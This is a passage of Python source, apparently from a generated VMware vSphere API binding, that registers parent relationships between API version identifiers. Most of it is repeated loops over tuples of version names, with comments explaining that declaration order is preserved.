AddVersionParent("vim.version.v6_8_7", "vim.version.version12")
AddVersionParent("vim.version.v6_8_7", "vim.version.version8")
AddVersionParent("vim.version.v6_8_7", "vim.version.version9")
AddVersionParent("vim.version.v6_8_7", "vim.version.version6")
AddVersionParent("vim.version.v6_8_7", "vim.version.version7")
AddVersionParent("vim.version.v6_8_7", "vim.version.version1")
AddVersionParent("vim.version.v6_8_7", "vim.version.version4")
AddVersionParent("vim.version.v6_8_7", "vim.version.version5")
AddVersionParent("vim.version.v6_8_7", "vim.version.version2")
AddVersionParent("vim.version.v6_8_7", "vim.version.version3")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.version.version0")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.version.version1")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.version.version2")
AddVersionParent("vmodl.reflect.version.version1", "vmodl.reflect.version.version1")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.version.version0")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.version.version1")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.version.version2")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.reflect.version.version1")
AddVersionParent("vmodl.reflect.version.version2", "vmodl.reflect.version.version2")
# Parent registrations for "vim.version.v8_0_0_0".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.v8_0_0_0", _parent)
# Parent registrations for "vim.version.VQAT".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.VQAT",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VQAT", _parent)
# Parent registrations for "vim.version.VCDP_NestedFilters".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.VCDP_NestedFilters",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VCDP_NestedFilters", _parent)
# Parent registrations for "vim.version.nativeSnapshot".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.nativeSnapshot",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.nativeSnapshot", _parent)
# Parent registrations for "vim.version.hostProfiles".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.hostProfiles",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.hostProfiles", _parent)
# Parent registrations for "vim.version.GraphicsDRS".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.GraphicsDRS",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.GraphicsDRS", _parent)
# Parent registrations for "vim.version.v7_0_3_1".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.v7_0_3_1", _parent)
# Parent registrations for "vim.version.v7_0_3_2".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.v7_0_3_2", _parent)
# Parent registrations for "vim.version.v7_0_3_0".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.v7_0_3_0", _parent)
# Parent registrations for "vim.version.hwh".
# Same calls, same order as the generated per-line form.  NOTE: in this group
# the self-entry follows "vim.version.v7_0_3_0", unlike most other groups where
# it follows "vim.version.v8_0_0_0" — the order below mirrors the original.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.hwh",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.hwh", _parent)
# Parent registrations for "vim.version.version13".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version13",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version13", _parent)
# Parent registrations for "vim.version.version14".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version14", _parent)
# Parent registrations for "vim.version.version15".
# Same calls, same order as the generated per-line form.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version15", _parent)
# Parent registrations for "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT".
# Same calls, same order as the generated per-line form (this group also
# references the vim-namespace twin and dp-namespace versions).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "dp.version.version1",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
    "dp.version.v8_0_0_0",
):
    AddVersionParent("dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT", _parent)
# Parents of "vim.version.VSAN2_Configure", registered in the original
# declaration order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.VSAN2_Configure",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VSAN2_Configure", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.DRS_LB_REASONCODE", registered in the original
# declaration order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.DRS_LB_REASONCODE",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.DRS_LB_REASONCODE", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.gosCrashRemediation", registered in the original
# declaration order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.gosCrashRemediation",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.gosCrashRemediation", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.VCSOF_173", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.VCSOF_173",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VCSOF_173", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.pciSriovExtendedID", registered in the original
# declaration order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.pciSriovExtendedID",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.pciSriovExtendedID", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.vmxnet3UPT", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.vmxnet3UPT",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.vmxnet3UPT", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.version10", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version10",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version10", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.version11", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version11", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.VMcrypt_IntegrityProtection", registered in the
# original declaration order (AddVersionParent is defined earlier in this
# generated file). NOTE: the self-edge is declared between version11 and
# version12 in this group, unlike most sibling groups; order kept as-is.
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.VMcrypt_IntegrityProtection",
    "vim.version.version12",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.VMcrypt_IntegrityProtection", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.version12", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.version12", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.pciDeviceExt", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.pciDeviceExt",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.pciDeviceExt", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.toolsOffHost", registered in the original declaration
# order (AddVersionParent is defined earlier in this generated file).
for _parent in (
    "vmodl.query.version.version4",
    "vmodl.query.version.version3",
    "vmodl.query.version.version2",
    "vmodl.query.version.version1",
    "vim.version.v7_0_1_1",
    "vmodl.version.version0",
    "vmodl.version.version1",
    "vmodl.version.version2",
    "vim.version.v6_9_1",
    "vim.version.v7_0_0_2",
    "vim.version.v6_8_7",
    "vmodl.reflect.version.version1",
    "vmodl.reflect.version.version2",
    "vim.version.v8_0_0_0",
    "vim.version.v7_0_3_1",
    "vim.version.v7_0_3_2",
    "vim.version.v7_0_3_0",
    "vim.version.version13",
    "vim.version.version14",
    "vim.version.version15",
    "vim.version.version10",
    "vim.version.version11",
    "vim.version.version12",
    "vim.version.toolsOffHost",
    "vim.version.v7_0_2_0",
    "vim.version.v7_0_2_1",
    "vim.version.v7_0_1_0",
    "vim.version.v7_0",
    "vim.version.version8",
    "vim.version.version9",
    "vim.version.version6",
    "vim.version.version7",
    "vim.version.version1",
    "vim.version.version4",
    "vim.version.version5",
    "vim.version.version2",
    "vim.version.version3",
):
    AddVersionParent("vim.version.toolsOffHost", _parent)
del _parent  # keep the module namespace as clean as the original flat calls
# Parents of "vim.version.hostCertificateManagement", registered in the
